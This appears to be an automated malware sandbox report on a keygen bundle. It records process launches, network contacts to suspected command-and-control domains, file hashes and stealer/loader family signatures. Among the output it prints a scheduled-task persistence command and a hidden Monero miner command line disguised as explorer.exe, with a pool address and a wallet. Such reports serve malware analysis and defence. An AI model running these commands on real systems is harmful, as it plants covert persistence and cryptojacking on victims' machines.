C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1136

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5016 -ip 5016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 1180

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 ip-api.com udp
RU 186.2.171.3:80 186.2.171.3 tcp
US 8.8.8.8:53 startupmart.bar udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 best-supply-link.xyz udp
RU 186.2.171.3:443 186.2.171.3 tcp
US 8.8.8.8:53 2no.co udp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 172.67.149.76:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 75.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
DE 51.195.43.17:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 17.43.195.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 124.253.47.212.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/840-33-0x000000007283E000-0x000000007283F000-memory.dmp

memory/840-34-0x0000000000B20000-0x0000000000CF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/3968-55-0x0000000000E20000-0x0000000000E30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/2912-71-0x0000000000E40000-0x0000000000E48000-memory.dmp

memory/1524-70-0x0000000000E30000-0x0000000000E50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/1524-76-0x0000000001600000-0x000000000161A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/3496-97-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3496-103-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4580-102-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/3968-108-0x00000000017C0000-0x00000000017CE000-memory.dmp

memory/3968-109-0x0000000001810000-0x0000000001822000-memory.dmp

memory/3496-112-0x0000000003960000-0x0000000003970000-memory.dmp

memory/3496-118-0x0000000003AC0000-0x0000000003AD0000-memory.dmp

memory/3496-125-0x0000000004560000-0x0000000004568000-memory.dmp

memory/3496-126-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3496-128-0x0000000004620000-0x0000000004628000-memory.dmp

memory/3496-132-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3496-131-0x0000000004760000-0x0000000004768000-memory.dmp

memory/3496-133-0x0000000004B70000-0x0000000004B78000-memory.dmp

memory/3496-134-0x0000000004A70000-0x0000000004A78000-memory.dmp

memory/3496-135-0x00000000048E0000-0x00000000048E8000-memory.dmp

memory/3496-148-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3496-156-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 be317fcc9f3c0f0909413e3a9c9f7d6b
SHA1 26c737cf412744c35a1a68bf33324d8522938ef7
SHA256 37605b1267507e235ec32827e141f67a0ab901e329abe9091261eaf1c4217f1f
SHA512 f1fd7a12a1b3dd67bc66d431e5e8f665d66dc09eb15d51d5b153f7eb2bf640143135363d336295fda0905a327bf14d1ac2f47cf4e67f169a60f455135f7ab1eb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5385878b74afc82a4c4ef0f1293bb0c0
SHA1 1ee9cbf3c7a712ed91b2418b7841ecf8cf895927
SHA256 fbb4b78aba29fbbbc8153b8d5567bff16d0a4687aee426950b87cd9da1ab22e8
SHA512 4a3f40ef3e263026b8d8be4f0cbdd7c3faf90a4a8d95ff07d800db0d7718680ce7015ec3220a54fc97a2b87a54a7c228e3dd5ad7b106b91e1a8f927b508f9fd1

memory/3496-158-0x0000000004A10000-0x0000000004A18000-memory.dmp

memory/3496-171-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3496-179-0x0000000004A10000-0x0000000004A18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 2a9bafb7a427371e6a9a42a63b4555f1
SHA1 f0ece630ee618a71a4ad19fecb8fe0372d94c031
SHA256 e6b31cf3e28b73fdb3308bf4b4b9be1fe2c2c564971c6ad38cc113b0ae9a61c8
SHA512 65411be8e2a6bc9724bce154f7a6a91589acae7437035b78b3d05b3fed5a511c3501e1457a79a0c1837eff3f0393944ed09f3fa3fa5d7206abc172dc7687032b

memory/3496-181-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 a2463d5f134fc65cebacb6cc4065d11f
SHA1 1724c6aba247e87199dc78c7363587f1700b4c2a
SHA256 85be9500c7d0094f44eec5a0721e49bbdbafc6b85e83e4185bf47e8974b1f029
SHA512 9cd405c8e2c344417084699e91b1c11b1ee17622e553471b2a7cbdd158ec33b5f8f4255f6bfe50e08e5e2209e31cd60642cbb6639b529020b3f6c151a9af6053

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d

MD5 74ea2aaecbe5947e33ef38278cfc38ed
SHA1 f33ac4d516e60bb98ff82077cccb1480db3e2285
SHA256 666aec52b2d7833f2d9cffc19d105cc7971df465f50f724ffc90cf3fdf51707f
SHA512 3161e3c53337fa53ba0ec4bcc04b3941a53af437d2cc186293d2e055ca9ab6aadba4dfa892f6aad840e33cf3179642e3c896f61016e3ec0192d04cc40f2d0483

memory/3496-220-0x0000000004440000-0x0000000004448000-memory.dmp

memory/3496-221-0x0000000004460000-0x0000000004468000-memory.dmp

memory/3496-229-0x0000000004500000-0x0000000004508000-memory.dmp

memory/3496-232-0x0000000004500000-0x0000000004508000-memory.dmp

memory/3496-233-0x0000000004680000-0x0000000004688000-memory.dmp

memory/3496-234-0x0000000004730000-0x0000000004738000-memory.dmp

memory/3496-235-0x0000000004740000-0x0000000004748000-memory.dmp

memory/3496-236-0x0000000004690000-0x0000000004698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 1cb913e62009797ca7788b7a08ecfe53
SHA1 da4877fab34ec90b0c9a5ca2a88af48795ead464
SHA256 63b93118e6f44a1256f69c4dd111e56b0e002245a02d2b98d511ff5637a8ccff
SHA512 9bdfe407150bea45d2e9d17497a51c0829c386f2e2e6bdc462a92f5a5ec2b83d03f2404f1733a3c36393784cd39de2a9ae1ed4cd57a531401b22ccf8631b980e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 3f4680ff1fcaca0e97be23858c27c1d8
SHA1 ff59883b3fcd164d722d3015dd5e25c3b77f5f9e
SHA256 d79f1df31ba2919229391e60d257abfb154025745d058050e646c5c7b22e2e2c
SHA512 754c12e3d994d47d3da1ec7844442dcf35c35f8635e1a731580e83adc0f1b96b44990cd28f6ea942d442a6640383929e50a2445c76143b0718731adc4c8462b0

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d2c97799642b7ca5bead234e9a93a812
SHA1 fc7099e38c1de7d1d57ae314e7c58c3d43b0343b
SHA256 d98e4600c97ce9996be45f0b71e8698820e141a59e85ea97d1bd06b58c1c40d4
SHA512 a6de5cafae6ac04d24b45bf6d1e9ec5064d3d0e4876610346e7c3bcb5dbfa7133be823086e70a053c22923087ecac927bc6775f0c32d1272e10e6ae36cfd2ca1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d6e2f4fbf99c59fd62708d09c13c63d9
SHA1 1c0bf099eb501443f8c71278ff686fcd060ed702
SHA256 af6a8327169475ac9787082e25b71e1359b6be56557b5fafe16796e44e382d94
SHA512 269043bc0ba1989fa6d8b6b0cfc2d8179effc52a691ed300b71f962b506b01564f3bf94a66b9cea19bc71684ddfec96a0294284f3696e688cacdb094f1572d95

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 4c2caf9e16c30eee4876af875aedf853
SHA1 1225d85e071953dfa429f54f935c84e4f371992f
SHA256 8a5850bb25c30fe3adfc6b64f12af0d42211f6f4e013a4602fed7c566b20fef3
SHA512 975455b463c9240ca2849fe29ec94649412a15038b0574bb97609e12a2c4c5206e0768c091082177cb9f52a6bff1ca413c67fac73d522468a0e0475313a3315b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5dbec7d17ac207e2059ccad5d3c02eb2
SHA1 72c57279f427d91935399a3816d41dd6d1bf2ffa
SHA256 6744af2aed4bedfd36be458fa109072ee6d869e8a433df4669d5f9f5cd68fd4d
SHA512 8393f9fd02f4c05f462a297f1b39d82b958d7c22983bdfe9f82bf222fab00402a813fecb10ffa77b93ac2bf1496dfde92c33cd70faad5d9c3bb80c38db72d6ae

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 417481c433d1976baac3d90df7ca8123
SHA1 bc432d861c1d78666e2401fe928fc370e8a0df2d
SHA256 8e0f43de0070ff21503c21d766c1ebc384d5d404ac6850b70ea5579fe2f58a9b
SHA512 c16c91f451344dd600269d4a53e0a018b231b2004bf138aec00e5f117bcbcf0ea3da2eefefc852c749214986f1339303869dc6246f5dedcf3be9547e11272e94

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 fc1fd9ecba65827c81e85f530c55cebd
SHA1 87aef49227c18edc0662bd30c41fc50f84ef1080
SHA256 65760e79099da0c86aa205ca1f084c07555703f03de572cce2042edc8489af18
SHA512 cee43bca156000208fa8030972c7ca31b6ecb824de04d3011999b421e4a9b8e509116c2ea5547363c945f0c80141f12363a6337136e4bc610a2f606e76c7ecba

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 4f9cf16fa8f94852e6c823f68835866b
SHA1 551f93e9b65f25d3b15696958107cdfcfab8c753
SHA256 c34bf7c1f8d7f4298f53e185bff091b49d2d9a80bd2c2d39873675945270d2ee
SHA512 1255e5c218b8d451c422b825986fb3055f7d580e41890c7116ff65a67ac09e373752e3bbf02d1a5fb64d9a81a4864aceccd9969de50780776a4a7880292eb406

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 897121573663cd58c8d14a758f42379e
SHA1 cf3e025ed2c8283c0891841a7eb64c90e7ed2d65
SHA256 ac45d723773ede74ba50136392cc93e29b6c06a86283e578d381f4bca6287933
SHA512 cc3b97e4c8833e404caf2d71d25f1e6aa8abae2fa038da332a130ef162b417e9b181a49cbcb1ff76209989a20ec87a0c1d90847968e9116e3689a4dc40139d9e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7021994bdbc2cea4c91a6e0e9c1b9cfd
SHA1 86d2f125757effd0a9afe137d2ed7cf6d70905b2
SHA256 1a0545f2cbfe685dd1789481d3c984ebcd8ff59340b3bb06460a85cb6242036e
SHA512 90b3f2619a1955544ebbf34ae1924be625bac4a110711af5cdcf5e4ad1e7b089627de31fcf88f9cccaa65bf7f05ddd9e4069067dad701d0dbff8cd0897a68868

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5957374b7e02ec657bd99bb87805fff1
SHA1 f18f7bf9248ed57c819ddaa4a68edad49d5a5c1e
SHA256 49d8c9ab69bde7386cf01ce234b34f631595213a90847512703e7b53aa0ef764
SHA512 0d224087b90375afb35f4eeb891d06d7265a2b3635db37dc841b3e2a9870a33854105ed93f1eeb64049c0ebb97f57f2d41cc4dbc9975f95ffa40fc15fb1c6893

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 f34ea50fa63c94d8ebcdbb6afcae16a8
SHA1 0b7b97cc801db2d58a70018f8e87f7f9409a0c5a
SHA256 3c7ecbdc38afca5787f9f735f3e9be744b8d475cba1ca8fc87d732e8cc004bab
SHA512 8935ea16ba4f898648f716aed36801bbcd54981c099dc61499e2f2d1bdc8864fbac6b601e37e63572d4b33a38b460269db5e5a41ee1a9f6e6f065c010d86bdde

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 a02dfd2cb9de151e5154854ca1f899f2
SHA1 f4235c0197ad1664b0e619684dbc543b5d21765c
SHA256 8e5e3bacabb7342edbf723de1dc367902cf73ee27199cb1f930a8da3504feecb
SHA512 e280abea37f696e03c4ce20811c44b36cb38473952bc3e252a1df880872de5582d631c072c0aa2e1643bbde2b441c4fae33db5524ec2297a72f1516216a58714

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW

MD5 d3587b25682e6badd3938bf3105ff1b2
SHA1 8d94a6e94e2c23c55716ca11545f2d82c1c961f8
SHA256 ad65e47dee4ab88cb7c18b404d49b4eefdb5b7e9c10e520cdb2f3a377a82fd68
SHA512 b0fe622fac6445bb20c0de78043ece97f370cb92637694c9712dcc47a9d1ed1bd27f87db16f2c9a6970be3af5e31487e06843943f23faa6b0d87d4fba5844cbf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 3b6d52f2f7bc1b8f8d0b7ea14fc3a908
SHA1 14828c26955430a62dbefe9ceaa89a731749545f
SHA256 2fcf61843733833b1a1da0fcfd365e406ae3ec36dcb57cee0330228efd011ee7
SHA512 ddec87bfa047473788b3e6a349e5433264ba859c8a25a3f30aec0525e635039bc0f87715223d1a2677e40adff80a66ea9eb26840251e99b1be020d1ed4725872

memory/3496-622-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/4328-642-0x0000000000F30000-0x0000000000F4E000-memory.dmp

memory/4328-643-0x0000000002E90000-0x0000000002EAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1216-672-0x00000000003D0000-0x00000000003D6000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
